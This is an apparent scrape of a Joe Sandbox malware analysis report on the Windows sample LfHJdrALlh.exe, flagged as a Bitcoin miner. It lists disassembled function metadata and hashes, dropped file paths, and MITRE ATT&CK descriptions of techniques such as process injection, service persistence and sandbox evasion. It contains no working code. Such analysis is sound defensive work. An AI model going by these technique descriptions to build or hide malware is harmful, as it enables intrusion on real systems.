Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: bb436228cfd4f1ccd7155e40a7c38cfe919325a164204cb4bf39bfc481459dd7
Instruction ID: 6dde0a6cb0c710e6ba83898a0455ef224223442d8ea2fa93eb05d8d59e0ac844
Opcode Fuzzy Hash: bb436228cfd4f1ccd7155e40a7c38cfe919325a164204cb4bf39bfc481459dd7
Instruction Fuzzy Hash: BF4125B1200A4482FA66DF57F884BE927A1F79DBC4F554126EF0E877B1DA38C58AC700

Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002118
TlsGetValue.KERNEL32 ref: 000000014000214F
GetLastError.KERNEL32 ref: 0000000140002154
LeaveCriticalSection.KERNEL32 ref: 0000000140002212
free.MSVCRT ref: 0000000140002234
DeleteCriticalSection.KERNEL32 ref: 000000014000225D

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: b6daad202331d3377a7ea66a46ddf4e15fa82aecf61de4f4e6af2334f27ab8f3
Instruction ID: 85b1e329e0b1a08572ebc2c1fec366adfc50b0fd90975013ac30613e2b5d1ab5
Opcode Fuzzy Hash: b6daad202331d3377a7ea66a46ddf4e15fa82aecf61de4f4e6af2334f27ab8f3
Instruction Fuzzy Hash: E321F8B5205A5092FA2BDB63FD443E92365BB2DBD0F444121FF4A576B4DB78C9878700

Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 0000000140001E27

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: c28b12554d4a6c79ce808bd36c9e9ce77f260d0515e985456a5ccaa914272c8d
Instruction ID: 353b68a7c186469ba3dfaeb6628a2aef359421979753f414f4a078a371686747
Opcode Fuzzy Hash: c28b12554d4a6c79ce808bd36c9e9ce77f260d0515e985456a5ccaa914272c8d
Instruction Fuzzy Hash: CF2159B1A0150582FA7BDA2BB5943FA1192ABCD7E4F258536BF19473F5DF3C88828241

Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9

Strings

Unknown pseudo relocation bit size %d., xrefs: 0000000140001B7B
Unknown pseudo relocation protocol version %d., xrefs: 0000000140001B8B

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: e5d8ebd5758d5a4f54604a55e7de3be1c490fe11f4c8c19130e77cbf6da935bf
Instruction ID: d270e2f65666933e3b4117e97bcef0dbb4466358d2d0273278561e51e7a907b3
Opcode Fuzzy Hash: e5d8ebd5758d5a4f54604a55e7de3be1c490fe11f4c8c19130e77cbf6da935bf
Instruction Fuzzy Hash: EB5136B6710A44D6EB22CF67F8407E92762B75DBE8F448221EB19177B4CB38C586C700

Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 000000014000185A

Strings

Unknown error, xrefs: 0000000140001824
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 000000014000184D

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: af99127221d82ef0d8b822e140b018ded53f7d87d333435570a5b2e6f4756778
Instruction ID: cf1f24ffb5d2eae8d7145fab7a52e0f441b8d9a433b02ec8b20804439284df64
Opcode Fuzzy Hash: af99127221d82ef0d8b822e140b018ded53f7d87d333435570a5b2e6f4756778
Instruction Fuzzy Hash: 33F09671614A4482E622EB76F9413ED6361E75D7C1F54D211FF4D67662DF38D182C300

Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400021B2
TlsGetValue.KERNEL32 ref: 00000001400021EB
GetLastError.KERNEL32 ref: 00000001400021F0
LeaveCriticalSection.KERNEL32 ref: 000000014000226C

Memory Dump Source

Source File: 0000000B.00000002.4486033240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000000B.00000002.4486004156.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486058656.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486084822.0000000140008000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4486108401.0000000140009000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_140000000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 6fc405c86b9af7343f2bb51cef9e0bf49d7843e5d2997486b9003ac8a2fbe4b0
Instruction ID: 7d6343a71f304d913a925ede37f5c584d17af65e56df17c893f5aececf125f77
Opcode Fuzzy Hash: 6fc405c86b9af7343f2bb51cef9e0bf49d7843e5d2997486b9003ac8a2fbe4b0
Instruction Fuzzy Hash: BB01B6B6305A4092FA1BDB63FD043D86365BB2CBD1F494021EF0953AB4DFB9C9968300

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LfHJdrALlh.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

C:\Windows\Temp\xvkjzlkkmfrj.sys

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
LfHJdrALlh.exe

Function 00007FF612D31160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Function 00007FF612D31394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Function 00007FF612D33350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206
COMMON

Function 00007FF612D32690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322
COMMON

Function 00007FF612D31BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Function 00007FF612D32104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Function 00007FF612D31E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Function 00007FF612D31880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Function 00007FF612D31800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON